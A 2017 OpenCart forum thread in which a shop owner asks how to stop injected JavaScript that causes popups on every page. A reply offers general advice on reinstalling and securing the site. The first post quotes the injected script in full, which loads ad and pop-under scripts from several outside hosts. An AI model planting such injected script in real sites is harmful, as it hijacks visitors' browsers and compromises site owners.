Post by motofox » Sun Jul 30, 2017 7:45 pm

Hi, my site has been injected with a java script code hidden on everypage that causes popups for users.

my host vidahost.com advised me that it was slq injected and i needed to change the database passwords which i have done, then rolled back the database to one that was clean from a previous date and it was okay for a couple of days but now its back.

below is a sample of the code that appears when i press the source button in oc in the discription.
Can anyone advise how to stop this happening in a not too technical format, im not familiar with code.


<p><script type="text/javascript">//<![CDATA[
(function() {
var configuration = {
"token": "11f0dc1ed8453e409e04d86bea962f34",
"exitScript": {
"enabled": true
},
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//]]></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script></p>

New member

Posts

Joined
Wed Nov 19, 2014 10:44 pm

Post by IP_CAM » Mon Jul 31, 2017 2:32 am

Well, your Problem cannot be solved by some Forum Assistance, you'll need
a Professional, looking into your Site, Code, and DB, to find out first, how and why
someone could be able, to implement bad code on your Site.

I would rather advise you, to clean out the existing Shop Directory on the Server,
and then, upload a clean new piece of the same Software, after downloading, and
checking the DB for it's Content first. And then, make sure, that the new Software is
secured according standards, by possible use of some existing free Extensions,
like Secure Admin, and correctly CHMOD'ing Subs and Files, e.t.c., and also removing
possibly existing USER-UPLOAD Functions and such open Doors, always just
potentially endangering Systems. :'(

Just to give you some Ideas. But if you need assistance, just MAKE SURE, not to select
anyone, Web-UNKNOWN by a real Name, Address and a personally registered Site, it's
not worth the Risk, one takes, it one deals with people, hiding behind trees and bushes,
for what reason ever...
Good Luck ! ;)
Ernie

I'm rarely active at the OC Forum lately. To reach me, contact: jti@jacob.ch
A Demoversion of my free OpenCart LIGHT v.1.5.6.5 Software Edition
can be seen in real Action here: http://www.jti.li/shop/
---
1'200+ FREE OC Extension-Repositories - from OC v.1.5.x up,
on the world's largest OC-related Github Site: https://github.com/IP-CAM
---
Image


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland
Who is online

Users browsing this forum: No registered users and 68 guests